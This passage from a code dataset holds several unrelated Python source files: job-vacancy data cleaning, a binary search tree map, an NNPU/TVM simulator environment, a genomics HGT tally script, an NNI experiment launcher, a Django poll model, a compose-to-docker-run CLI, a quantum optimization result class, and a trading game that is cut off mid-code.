df_group.append(dfV)\n    group_name = vacancy\n    print('======================' + str(group_name) + '======================')\n    # Fill gaps in the minimum salary with the column mean\n    df_group[\"min_salary\"] = df_group[\"min_salary\"].fillna(df_group[\"min_salary\"].mean())\n    print(df_group[\"min_salary\"])\n\n    df_date = pandas.to_datetime(df_group['published_date']).dt.tz_localize(None)\n    df_date_now = pandas.to_datetime(datetime.now())\n    df_days = df_date_now - df_date\n    # Add a new feature derived from the \"publication date\" field:\n    # the time elapsed since the vacancy was published\n    df_group[\"publish_date\"] = df_days\n    print(df_group[\"publish_date\"])\n    # Fill gaps in the \"required experience\" field: if unspecified, no experience is required\n    df_group[\"experience\"] = df_group[\"experience\"].fillna(\"Нет опыта\")\n    # Fill gaps in the \"employment type\" field: if unspecified, any type is accepted\n    df_group[\"employment\"] = df_group[\"employment\"].fillna(\"Любой тип\")\n\n    # Drop rows with a missing city (assigning a column-wise dropna back would misalign the index)\n    df_group = df_group.dropna(subset=[\"city\"])\n    df_group[\"description\"] = df_group[\"description\"].fillna(\"Нет описания\")\n    df_group[\"duty\"] = df_group[\"duty\"].fillna(\"Нет описания обязанностей\")\n    df_group[\"requirements\"] = df_group[\"requirements\"].fillna(\"Нет описания требований\")\n    df_group[\"terms\"] = df_group[\"terms\"].fillna(\"Нет описания условий\")\n    # Need to decide what to fill in for skills when the company left them blank. I would leave them empty,\n    # though one could simply set the value to \"undefined\"\n    #df_group[\"skills\"] = df_group[\"skills\"].fillna(\"[{'name': 'Неопределено'}]\")\n    df_group[\"skills\"] = df_group[\"skills\"].fillna(\"Не указано\")\n    df_group = pandas.DataFrame()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"65099447","text":"class BinarySearchTreeMap:\n\n    class Item:\n        def __init__(self, key, value=None):\n            self.key = key\n            self.value = value\n\n    class Node:\n        def __init__(self, item):\n            self.item = item\n            self.parent = None\n            self.left = None\n            self.right = None\n\n        def num_children(self):\n            count = 0\n            if (self.left is not None):\n                count += 1\n            if (self.right is not None):\n                count += 1\n            return count\n\n        def disconnect(self):\n            self.item = None\n            self.parent = None\n            self.left = None\n            self.right = None\n\n    def __init__(self):\n        self.root = None\n        self.size = 0\n\n    def __len__(self):\n        return self.size\n\n    def is_empty(self):\n        return len(self) == 0\n\n    # raises exception if not found\n    def __getitem__(self, key):\n        node = self.subtree_find(self.root, key)\n        if (node is None):\n            raise KeyError(str(key) + \" not found\")\n        else:\n            return node.item.value\n\n    # returns None if not found\n    def subtree_find(self, subtree_root, key):\n        curr = subtree_root\n        while (curr is not None):\n            if (curr.item.key == key):\n                return curr\n            elif (curr.item.key > key):\n                curr = curr.left\n            else: # (curr.item.key < key)\n                curr = curr.right\n        return None\n\n\n    # updates value if key already exists\n    def __setitem__(self, key, value):\n        node = self.subtree_find(self.root, key)\n        if (node is None):\n            self.subtree_insert(key, value)\n        else:\n            node.item.value = value\n\n    # assumes key not in tree\n    def subtree_insert(self, key, value=None):\n        item = BinarySearchTreeMap.Item(key, value)\n        new_node = BinarySearchTreeMap.Node(item)\n        if (self.is_empty()):\n            self.root = new_node\n            self.size = 1\n        else:\n            parent = self.root\n            if(key < self.root.item.key):\n                curr = self.root.left\n            else:\n                curr = self.root.right\n            while (curr is not None):\n                parent = curr\n                if (key < curr.item.key):\n                    curr = curr.left\n                else:\n                    curr = curr.right\n            if (key < parent.item.key):\n                parent.left = new_node\n            else:\n                parent.right = new_node\n            new_node.parent = parent\n            self.size += 1\n\n\n    #raises exception if key not in tree\n    def __delitem__(self, key):\n        if (self.subtree_find(self.root, key) is None):\n            raise KeyError(str(key) + \" is not found\")\n        else:\n            self.subtree_delete(self.root, key)\n\n    #assumes key is in tree + returns the associated value\n    def subtree_delete(self, node, key):\n        node_to_delete = self.subtree_find(node, key)\n        value = node_to_delete.item.value\n        num_children = node_to_delete.num_children()\n\n        if (node_to_delete is self.root):\n            if (num_children == 0):\n                self.root = None\n                node_to_delete.disconnect()\n                self.size -= 1\n\n            elif (num_children == 1):\n                if (self.root.left is not None):\n                    self.root = self.root.left\n                else:\n                    self.root = self.root.right\n                self.root.parent = None\n                node_to_delete.disconnect()\n                self.size -= 1\n\n            else: #num_children == 2\n                # replace with the in-order predecessor (max of the left subtree), then delete that node\n                max_of_left = self.subtree_max(node_to_delete.left)\n                
node_to_delete.item = max_of_left.item\n self.subtree_delete(node_to_delete.left, max_of_left.item.key)\n\n else:\n if (num_children == 0):\n parent = node_to_delete.parent\n if (node_to_delete is parent.left):\n parent.left = None\n else:\n parent.right = None\n\n node_to_delete.disconnect()\n self.size -= 1\n\n elif (num_children == 1):\n parent = node_to_delete.parent\n if(node_to_delete.left is not None):\n child = node_to_delete.left\n else:\n child = node_to_delete.right\n\n child.parent = parent\n if (node_to_delete is parent.left):\n parent.left = child\n else:\n parent.right = child\n\n node_to_delete.disconnect()\n self.size -= 1\n\n else: #num_children == 2\n max_of_left = self.subtree_max(node_to_delete.left)\n node_to_delete.item = max_of_left.item\n self.subtree_delete(node_to_delete.left, max_of_left.item.key)\n\n return value\n\n # assumes non empty subtree\n def subtree_max(self, curr_root):\n node = curr_root\n while (node.right is not None):\n node = node.right\n return node\n\n\n def inorder(self):\n for node in self.subtree_inorder(self.root):\n yield node\n\n def subtree_inorder(self, curr_root):\n if (curr_root is None):\n pass\n else:\n yield from self.subtree_inorder(curr_root.left)\n yield curr_root\n yield from self.subtree_inorder(curr_root.right)\n\n def __iter__(self):\n for node in self.inorder():\n yield (node.item.key, node.item.value)\n","sub_path":"BinarySearchTreeMap.py","file_name":"BinarySearchTreeMap.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541553847","text":"'''the environment and context of NNPU hardware simulator\nsome code are from tvm/vta\n'''\n\nimport os\nimport json\nimport copy\nimport tvm\nimport yaml\n\nfrom .intrins import IntrinManager\nfrom .intrins import make_intrin_call\nfrom .helper import convert_scope\n\nclass Environment(object):\n \"\"\"Hardware configuration object.\n\n This object contains all the information\n needed for compiling to a specific NNPU backend.\n\n Parameters\n ----------\n cfg : dict of str to value.\n The configuration parameters.\n\n Example\n --------\n .. 
code-block:: python\n\n # the following code reconfigures the environment\n # temporarily to attributes specified in new_cfg.json\n new_cfg = json.load(json.load(open(\"new_cfg.json\")))\n with vta.Environment(new_cfg):\n # env works on the new environment\n env = vta.get_env()\n \"\"\"\n\n current = None\n # some constants\n dram_scope = 'local.nnpu_dram'\n scratchpad_scope_prefix = 'local.nnpu_scratchpad'\n uni_scratchpad_scope = scratchpad_scope_prefix + '0'\n acc_scope = 'local.nnpu_acc_buffer'\n # compiler pragmas\n dma_copy_pragma = 'nnpu_dma_copy'\n dma_copy_to_buf = 'nnpu_dma_to_scratchpad'\n dma_copy_from_buf = dma_copy_to_buf\n scratchpad_ls = 'nnpu_scratchpad_ls'\n scratchpad_copy = 'nnpu_scratchpad_copy'\n copy_acc2buf = 'nnpu_copy_acc2buf'\n # pipeline IDs:\n pid_dma_copy = 1\n pid_matrix_compute = 2\n pid_acc2buf_copy = 2\n pid_vector_compute = 3\n def pid_scratchpad_copy(self, dst):\n return 4 + self.scratchpad_scope_to_idx(dst)\n\n def __init__(self, cfg_path):\n self.cfg = {}\n\n cfg = yaml.load(open(cfg_path), Loader=yaml.SafeLoader)\n self.cfg_path = cfg_path\n self.cfg.update(cfg)\n\n self.nnpu_axis = tvm.thread_axis('nnpu')\n\n self.intrins = IntrinManager(self)\n pass\n\n def __enter__(self):\n self.last_env = Environment.current\n Environment.current = self\n #set_device(self)\n return self\n\n def __exit__(self, ptype, value, trace):\n Environment.current = self.last_env\n # reset device based on the last Environment\n #set_device(Environment.current)\n\n def scratchpad_scope(self, scratchpad_id = 0):\n assert scratchpad_id < 8, 'scratchpad_id should be less than 8'\n return self.scratchpad_scope_prefix + str(scratchpad_id)\n\n def get_scope(self, name):\n return convert_scope(self, name, True)\n\n def scratchpad_scope_to_idx(self, scope):\n assert self.is_scratchpad_scope(scope), \\\n '{0} is not a scratchpad scope name'\n id = scope[len(self.scratchpad_scope_prefix):]\n id = int(id)\n assert id < 8, 'scratchpad_id should be less than 8'\n return id\n\n def is_scratchpad_scope(self, scope):\n return scope.startswith(self.scratchpad_scope_prefix)\n\n def get_scope_config(self, scope):\n key = None\n if (self.is_scratchpad_scope(scope)):\n id = self.scratchpad_scope_to_idx(scope)\n key = 'scratchpad' + str(id)\n elif (scope == self.acc_scope):\n key = 'acc_buffer'\n else:\n raise ValueError('illegal scope name')\n return self.cfg[key]\n\n def get_pid(self, pid):\n return pid\n\n# set device with the configs in the environment\ndef set_device(env, device_id=0, type='S0'):\n func = tvm.get_global_func('nnpu.set_dev', False)\n print(\"setting device with config file: {0}\".format(env.cfg_path))\n func(int(device_id), str(type), str(env.cfg_path))\n\ndef set_dump(value):\n value = bool(value)\n func = tvm.get_global_func('nnpu.set_dump', True)\n if (func):\n func(value)\n\ndef set_profile(profiles, dir=None):\n func = tvm.get_global_func('nnpu.set_profile', False)\n flags = {'timeline': 0x1, 'memory_access_latency': 0x2}\n flag = 0\n for item in profiles:\n if (item in flags):\n flag = flag | flags[item]\n if (dir is not None):\n import os, errno\n try:\n os.makedirs(dir)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n func(flag, dir)\n else:\n func(flag)\n\ndef get_env():\n return Environment.current\n\n# The memory information for the compiler\n@tvm.register_func(\"tvm.info.mem.%s\" % Environment.dram_scope)\ndef mem_info_dram():\n spec = get_env()\n dram_cfg = spec.cfg['dram']\n return tvm.make.node(\"MemoryInfo\",\n unit_bits=8,\n 
max_simd_bits=dram_cfg['width_per_channel'],\n max_num_bits=dram_cfg['nchannel'] * (1 << dram_cfg['log_size_per_channel']) * 8,\n head_address=None)\n\n#################################\n# register scratchpad memories. #\n#################################\ndef get_scratchpad_memory_info(env, scratchpad_idx):\n from .helper import scratchpad_base_addr\n scope = env.scratchpad_scope(scratchpad_idx)\n buffer_cfg = env.get_scope_config(scope)\n if (buffer_cfg and buffer_cfg['enable']):\n return tvm.make.node(\"MemoryInfo\",\n unit_bits=8,\n max_simd_bits=buffer_cfg['width_per_channel'],\n max_num_bits=(1 << buffer_cfg['log_size']) * 8,\n head_address=None,\n base_address=scratchpad_base_addr[scratchpad_idx])\n else:\n raise ValueError('scratchpad buffer \"{0}\" is not enabled, please check config file'.format(scope))\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '0'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 0)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '1'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 1)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '2'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 2)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '3'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 3)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '4'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 4)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '5'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 5)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '6'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 6)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '7'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 7)\n\n#################################\n# register accumulation buffer. 
#\n#################################\n@tvm.register_func("tvm.info.mem.%s" % Environment.acc_scope)\ndef mem_info_acc():\n    spec = get_env()\n    acc_cfg = spec.cfg['acc_buffer']\n    return tvm.make.node("MemoryInfo",\n                         unit_bits=8,\n                         max_simd_bits=acc_cfg['width_per_channel'],\n                         max_num_bits=(1 << acc_cfg['log_size']) * 8,\n                         head_address=None,\n                         base_address=0)\n\n\ndef init_default_env():\n    """Initialize the default global env"""\n    curr_path = os.path.dirname(\n        os.path.abspath(os.path.expanduser(__file__)))\n    proj_root = os.path.abspath(os.path.join(curr_path, "../../../"))\n    filename = "nnpu_config.yaml"\n    path_list = [\n        os.path.join(curr_path, filename),\n        os.path.join(proj_root, "build", filename),\n        os.path.join(proj_root, filename),\n        os.path.join(proj_root, "nnpu", filename),\n        os.path.join(proj_root, "nnpu/config", filename)\n    ]\n    path_list = [p for p in path_list if os.path.exists(p)]\n    if not path_list:\n        raise RuntimeError(\n            "Error: {} not found. Make sure the config file is present in your NNPU root"\n            .format(filename))\n    return Environment(path_list[0])\n\n# TVM related registration\n@tvm.register_func("tvm.intrin.rule.default.nnpu.coproc_sync")\ndef coproc_sync(op):\n    _ = op\n    return tvm.const(0, 'int32')\n\n@tvm.register_func("tvm.intrin.rule.default.nnpu.coproc_dep_push")\ndef coproc_dep_push(op):\n    return make_intrin_call('void', 'DependPush',\n                            op.args[0], op.args[1])\n\n@tvm.register_func("tvm.intrin.rule.default.nnpu.coproc_dep_pop")\ndef coproc_dep_pop(op):\n    return make_intrin_call('void', 'DependPop',\n                            op.args[0], op.args[1])\n\nEnvironment.current = init_default_env()\n","sub_path":"nnpu/python/nnpu/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":8963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"504238885","text":"import os\nimport glob\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom Bio import SeqIO\nimport seaborn as sns\nimport s0_Kelp_bins_config\nimport s0_Kelp_bins_config as KelpCfg\nfrom s0_suspicious_HGTs import suspicious_HGTs\n\n\n############################################### input file and parameters ##############################################\n\ngenome_id_file = '/Users/songweizhi/Desktop/KelpBins/genome_id_list.txt'\n\nday_list = ['050416', '060416', '080416',  # 2016-04: 05, 06, 08\n            '070616', '140616',            # 2016-06: 07, 14\n            '050716', '070716',            # 2016-07: 05, 07\n            '110816', '170816',            # 2016-08: 11, 17\n            '061016',                      # 2016-10: 06\n            '141216', '161216',            # 2016-12: 14, 16\n            '070217', '080217',            # 2017-02: 07, 08\n            '040417', '050417',            # 2017-04: 04, 05\n            '050617', '130617']            # 2017-06: 05, 13\n\nmonth_list = ['0416', '0616', '0716', '0816', '1016', '1216', '0217', '0417', '0617']\nlocation_list = ['BH', 'BI', 'CB', 'SH']\nhost = 'ER'\n\n\nwd = '/Users/songweizhi/Desktop/KelpBins/combined_pcofg'\ngrouping_file_folder = 'GoodBins_0.5_0.05_pcofg_grouping'\nPG_output_folder = 'TT_90MGs_PG'\npwd_candidates_seq_file = 'GoodBins_0.5_0.05_all_combined_ffn.fasta'\noutput_prefix = ''\ndetection_ranks = 'pcofg'\ngrouping_file_highest_rank = '/Users/songweizhi/Desktop/KelpBins/GoodBins_0.5_0.05_pcofg_grouping/GoodBins_0.5_0.05_p10_grouping.txt'\npwd_candidates_file_PG_normal_txt = 'GoodBins_0.5_0.05_PG_pcofg_normal.txt'\nplot_all_genomes = 
False\npwd_group_to_taxon_file = '/Users/songweizhi/Desktop/KelpBins/GoodBins_0.5_0.05_pcofg_grouping/GoodBins_0.5_0.05_c15_group_to_taxon.txt'\ngrouping_file = '/Users/songweizhi/Desktop/KelpBins/GoodBins_0.5_0.05_pcofg_grouping/GoodBins_0.5_0.05_c15_grouping.txt'\n\nos.chdir(wd)\n\n########################################################################################################################\n\n\n# get the number of HGT at each month\nsample_month_HGT_num = {}\nfor each in open(pwd_candidates_file_PG_normal_txt):\n if not each.startswith('Gene_1'):\n each_split = each.strip().split('\\t')\n gene_1 = each_split[0]\n gene_2 = each_split[1]\n concatenated_genes = '%s___%s' % (gene_1, gene_2)\n\n if concatenated_genes not in suspicious_HGTs:\n gene_1_genome = '_'.join(gene_1.split('_')[:-1])\n gene_2_genome = '_'.join(gene_2.split('_')[:-1])\n direction = each_split[6]\n\n donor_genome = direction.split('-->')[0]\n recipient_genome = direction.split('-->')[1]\n if '%)' in recipient_genome:\n recipient_genome = recipient_genome.split('(')[0]\n\n sample_date = recipient_genome.split('_')[2]\n sample_month = sample_date[2:]\n\n # get the number of HGT at each month\n if sample_month not in sample_month_HGT_num:\n sample_month_HGT_num[sample_month] = 1\n else:\n sample_month_HGT_num[sample_month] += 1\n\n\n# get genome size dict\ngenome_size_dict = {}\nfor each_genome_size in open(KelpCfg.genome_size_file):\n if not each_genome_size.startswith('Genome'):\n each_genome_size_split = each_genome_size.strip().split('\\t')\n genome_id = each_genome_size_split[0]\n genome_size = float(each_genome_size_split[1])\n genome_size_dict[genome_id] = genome_size\n\n\n# get the total length of genome bins at each month\nsample_month_genome_size_dict = {}\nfor genome in genome_size_dict:\n genome_size = genome_size_dict[genome]\n sample_month = genome.split('_')[2][2:]\n if sample_month not in sample_month_genome_size_dict:\n sample_month_genome_size_dict[sample_month] = genome_size\n else:\n sample_month_genome_size_dict[sample_month] += genome_size\n\n\nprint('The number of HGT per Mbp sequences at a monthly basis for all genome bins:')\nfor mth in month_list:\n mth_HGT_num = sample_month_HGT_num[mth]\n mth_genome_size = sample_month_genome_size_dict[mth]\n print('%s\\t%s' % (mth, float(\"{0:.2f}\".format(mth_HGT_num/mth_genome_size))))\n\n\n\n\n\n\n\n\n","sub_path":"old_1/s19_recent_HGT_with_time_2_all_bins.py","file_name":"s19_recent_HGT_with_time_2_all_bins.py","file_ext":"py","file_size_in_byte":4485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"86949663","text":"import contextlib\nimport logging\nfrom pathlib import Path\nimport socket\nfrom subprocess import Popen\nimport sys\nimport time\nfrom typing import Optional, Tuple\n\nimport colorama\n\nimport nni.runtime.protocol\nimport nni_node\n\nfrom .config import ExperimentConfig\nfrom .config import convert\nfrom .pipe import Pipe\nfrom . 
import rest\nfrom ..tools.nnictl.config_utils import Experiments\n\n_logger = logging.getLogger('nni.experiment')\n\n\ndef start_experiment(exp_id: str, config: ExperimentConfig, port: int, debug: bool) -> Tuple[Popen, Pipe]:\n    pipe = None\n    proc = None\n\n    config.validate(initialized_tuner=True)\n    _ensure_port_idle(port)\n    if isinstance(config.training_service, list):  # hybrid training service\n        _ensure_port_idle(port + 1, 'Hybrid training service requires an additional port')\n    elif config.training_service.platform in ['remote', 'openpai', 'kubeflow', 'frameworkcontroller', 'adl']:\n        _ensure_port_idle(port + 1, f'{config.training_service.platform} requires an additional port')\n\n    try:\n        _logger.info('Creating experiment, Experiment ID: %s', colorama.Fore.CYAN + exp_id + colorama.Style.RESET_ALL)\n        pipe = Pipe(exp_id)\n        start_time, proc = _start_rest_server(config, port, debug, exp_id, pipe.path)\n        _logger.info('Connecting IPC pipe...')\n        pipe_file = pipe.connect()\n        nni.runtime.protocol._in_file = pipe_file\n        nni.runtime.protocol._out_file = pipe_file\n        _logger.info('Starting web server...')\n        _check_rest_server(port)\n        platform = 'hybrid' if isinstance(config.training_service, list) else config.training_service.platform\n        _save_experiment_information(exp_id, port, start_time, platform,\n                                     config.experiment_name, proc.pid, config.experiment_working_directory)\n        _logger.info('Setting up...')\n        _init_experiment(config, port, debug)\n        return proc, pipe\n\n    except Exception as e:\n        _logger.error('Create experiment failed')\n        if proc is not None:\n            with contextlib.suppress(Exception):\n                proc.kill()\n        if pipe is not None:\n            with contextlib.suppress(Exception):\n                pipe.close()\n        raise e\n\n\ndef _ensure_port_idle(port: int, message: Optional[str] = None) -> None:\n    sock = socket.socket()\n    busy = sock.connect_ex(('localhost', port)) == 0\n    sock.close()\n    if busy:\n        message = f'({message})' if message else ''\n        raise RuntimeError(f'Port {port} is not idle {message}')\n\n\ndef _start_rest_server(config: ExperimentConfig, port: int, debug: bool, experiment_id: str, pipe_path: str) -> Tuple[int, Popen]:\n    if isinstance(config.training_service, list):\n        ts = 'hybrid'\n    else:\n        ts = config.training_service.platform\n    if ts == 'openpai':\n        ts = 'pai'\n\n    args = {\n        'port': port,\n        'mode': ts,\n        'experiment_id': experiment_id,\n        'start_mode': 'new',\n        'log_level': 'debug' if debug else 'info',\n        'dispatcher_pipe': pipe_path,\n    }\n\n    node_dir = Path(nni_node.__path__[0])\n    node = str(node_dir / ('node.exe' if sys.platform == 'win32' else 'node'))\n    main_js = str(node_dir / 'main.js')\n    cmd = [node, '--max-old-space-size=4096', main_js]\n    for arg_key, arg_value in args.items():\n        cmd.append('--' + arg_key)\n        cmd.append(str(arg_value))\n\n    if sys.platform == 'win32':\n        from subprocess import CREATE_NEW_PROCESS_GROUP\n        proc = Popen(cmd, cwd=node_dir, creationflags=CREATE_NEW_PROCESS_GROUP)\n    else:\n        proc = Popen(cmd, cwd=node_dir)\n    return int(time.time() * 1000), proc\n\n\ndef _check_rest_server(port: int, retry: int = 3) -> None:\n    for i in range(retry):\n        with contextlib.suppress(Exception):\n            rest.get(port, '/check-status')\n            return\n        if i > 0:\n            _logger.warning('Timeout, retry...')\n        time.sleep(1)\n    rest.get(port, '/check-status')\n\n\ndef _init_experiment(config: ExperimentConfig, port: int, debug: bool) -> None:\n    for cluster_metadata in convert.to_cluster_metadata(config):\n        rest.put(port, '/experiment/cluster-metadata', cluster_metadata)\n    rest.post(port, '/experiment', convert.to_rest_json(config))\n\n\ndef 
_save_experiment_information(experiment_id: str, port: int, start_time: int, platform: str, name: str, pid: int, logDir: str) -> None:\n    experiment_config = Experiments()\n    experiment_config.add_experiment(experiment_id, port, start_time, platform, name, pid=pid, logDir=logDir)\n","sub_path":"nni/experiment/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"163399162","text":"from django.db import models\n\nfrom apps.users.models import Employee, \\\n    Program\nfrom apps.enrollment.courses.models.group import GROUP_TYPE_CHOICES\n\nfrom .section import SectionOrdering, Section\n\n\nclass Template(models.Model):\n    title = models.CharField(max_length=40, verbose_name='tytuł')\n    description = models.TextField(blank=True, verbose_name='opis')\n    studies_type = models.ForeignKey(\n        Program,\n        verbose_name='typ studiów',\n        blank=True,\n        null=True,\n        on_delete=models.CASCADE)\n    no_course = models.BooleanField(\n        blank=False,\n        null=False,\n        default=False,\n        verbose_name='nie przypisany')\n    deleted = models.BooleanField(blank=False, null=False, default=False, verbose_name='usunięty')\n    exam = models.BooleanField(blank=False, null=False, default=True,\n                               verbose_name='przedmiot z egzaminem')\n    group_type = models.CharField(\n        blank=True,\n        null=True,\n        max_length=2,\n        choices=GROUP_TYPE_CHOICES,\n        verbose_name='typ zajęć')\n    sections = models.ManyToManyField(Section, verbose_name='sekcje',\n                                      through='TemplateSections')\n\n    in_grade = models.BooleanField(default=False, verbose_name='Szablon wykorzystywany w ocenie')\n\n    author = models.ForeignKey(Employee, verbose_name='autor', on_delete=models.CASCADE)\n\n    class Meta:\n        verbose_name = 'szablon'\n        verbose_name_plural = 'szablony'\n        app_label = 'poll'\n        ordering = ['title']\n\n    def __str__(self):\n        res = str(self.title)\n        if self.studies_type:\n            res += ', typ studiów: ' + str(self.studies_type)\n        # the model defines no `course` field, so guard the legacy attribute lookup\n        if getattr(self, 'course', None):\n            res += ', przedmiot: ' + str(self.course)\n        if self.group_type:\n            res += ', typ grupy: ' + str(self.get_group_type_display())\n        return res\n\n    def all_sections(self):\n        sections = self.templatesections_set.all().values_list('pk', flat=True)\n        return Section.objects.filter(pk__in=sections)\n\n\nclass TemplateSections(models.Model):\n    id = models.AutoField(primary_key=True)\n    template = models.ForeignKey(Template, verbose_name='ankieta', on_delete=models.CASCADE)\n    section = models.ForeignKey(Section, verbose_name='sekcja', on_delete=models.CASCADE)\n\n    class Meta:\n        verbose_name_plural = 'pozycje sekcji'\n        verbose_name = 'pozycja sekcji'\n        app_label = 'poll'\n        ordering = ['id']\n\n    def all_questions(self):\n        return self.section.all_questions()\n","sub_path":"zapisy/apps/grade/poll/models/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"279864929","text":"# -*- coding: utf-8 -*-\n\nimport click\nimport yaml\nfrom dc2dr import parser\n\ndef parse_yml(path):\n    # a context manager closes the file deterministically instead of leaking the handle\n    with open(path) as f:\n        y = yaml.safe_load(f)\n\n    run_commands = parser.parse_compose_file(y)\n    for c in run_commands:\n        print(c)\n\n@click.command()\n@click.argument('f', type=click.Path(exists=True))\ndef main(f):\n    parse_yml(f)\n\nif __name__ == \"__main__\":\n    
main()\n","sub_path":"dc2dr/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"494912761","text":"from abc import ABC\nfrom typing import List\nfrom ..typings.configurations import OptimalConfigurations\nfrom .aux import build_probabilities_matrix, build_amplitudes_matrix, get_number_eta_pairs\n\n\nclass OptimizationResult(ABC):\n \"\"\" Generic class acting as an interface for any Optimization Result \"\"\"\n\n def __init__(self, optimal_configurations: OptimalConfigurations) -> None:\n\n self._two_eta_configurations = self._convert_input_group_eta_configurations_into_two_etas(\n optimal_configurations)\n self._probabilities_matrices = [build_probabilities_matrix(two_eta_configuration)\n for two_eta_configuration in self._two_eta_configurations]\n self._amplitudes_matrices = [build_amplitudes_matrix(two_eta_configuration)\n for two_eta_configuration in self._two_eta_configurations]\n\n @property\n def probabilities_matrix(self) -> List[List[float]]:\n return self._probabilities_matrices[0]\n\n @property\n def amplitudes_matrix(self) -> List[List[float]]:\n return self._amplitudes_matrices[0]\n\n @property\n def probabilities_matrices(self) -> List[List[List[float]]]:\n return self._probabilities_matrices\n\n @property\n def amplitudes_matrices(self) -> List[List[List[float]]]:\n return self._amplitudes_matrices\n\n def _convert_input_group_eta_configurations_into_two_etas(self,\n optimal_configurations: OptimalConfigurations\n ) -> List[OptimalConfigurations]:\n eta_groups_length = len(optimal_configurations['eta_groups'][0])\n\n if eta_groups_length > 3:\n raise ValueError('Eta groups support only 2 or 3 elements')\n if eta_groups_length == 2:\n return [optimal_configurations]\n\n number_eta_pairs, _ = get_number_eta_pairs(optimal_configurations['eta_groups'])\n\n return self._get_two_eta_configurations(optimal_configurations, number_eta_pairs, eta_groups_length)\n\n def _get_two_eta_configurations(self, optimal_configurations: OptimalConfigurations,\n number_eta_pairs: int,\n eta_groups_length: int) -> List[OptimalConfigurations]:\n\n number_third_channels = int(len(optimal_configurations['eta_groups']) / number_eta_pairs)\n if number_third_channels <= 1:\n return [optimal_configurations]\n\n list_configs = []\n for i in range(number_eta_pairs):\n new_config = OptimalConfigurations({\n 'eta_groups': optimal_configurations['eta_groups']\n [i * number_third_channels:(i + 1) * number_third_channels],\n 'best_algorithm': optimal_configurations['best_algorithm']\n [i * number_third_channels:(i + 1) * number_third_channels],\n 'probabilities': optimal_configurations['probabilities']\n [i * number_third_channels:(i + 1) * number_third_channels],\n 'configurations': optimal_configurations['configurations']\n [i * number_third_channels:(i + 1) * number_third_channels],\n 'number_calls_made': optimal_configurations['number_calls_made']\n [i * number_third_channels:(i + 1) * number_third_channels]\n })\n list_configs.append(new_config)\n\n return list_configs\n","sub_path":"qcd/optimizationresults/optimizationresult.py","file_name":"optimizationresult.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"222566111","text":"from __future__ import print_function\n\nimport collections\nimport curses\nimport itertools\nimport random\nimport time\n\nFPS = 30\nREFRESH_TIME = 
float(1)/FPS\nSTARTING_CASH = 100\nGRAPH_MAX_WIDTH = 80\n\n\nclass ShavingGame(object):\n\n    def __init__(self):\n        self.cash = STARTING_CASH\n        self.buy = 5\n        self.sell = 5.01\n        self.owned = 0\n        self.debug_str = ''\n        self.render_time = time.time()\n        self.price_time = time.time()\n        self.trend_time = time.time()\n        self.trend_up = 1\n        self.buy_limits = collections.defaultdict(lambda:0)\n        self.sell_limits = collections.defaultdict(lambda:0)\n        self.price_history = collections.deque()\n\n    def draw_graph(self, start_index, values, height=10):\n        lines = ['Price History']\n        if not values:\n            return lines\n        mx = max(values)\n        mn = min(values)\n        diff = mx - mn\n        for i in range(height):\n            line = ''\n            for val in values:\n                line += ' ' if mn + (height-i) * diff / height > val else 'X'\n            line = '{0:>80}'.format(line)\n            lines.append(line)\n        return lines\n\n    def update_price(self):\n        if self.price_time > time.time():\n            return\n        if self.trend_time < time.time():\n            self.trend_time = time.time() + random.uniform(5, 15)\n            self.trend_up = random.randint(0, 1)\n        change = round(random.uniform(-0.03 if not self.trend_up else -0.02, 0.03 if self.trend_up else 0.02), 2)\n\n        self.debug_str = "change={} trend_up={}".format(change, self.trend_up)\n        self.buy += change\n        self.sell = self.buy + float(random.randrange(1,2))/100\n        self.price_time = time.time() + float(random.randrange(5,20))/10\n        self.price_history.append(self.buy)\n        if len(self.price_history) > GRAPH_MAX_WIDTH:\n            self.price_history.popleft()\n\n        # fill any limit orders that are now marketable\n        for price in (price for price in self.buy_limits if price >= self.sell):\n            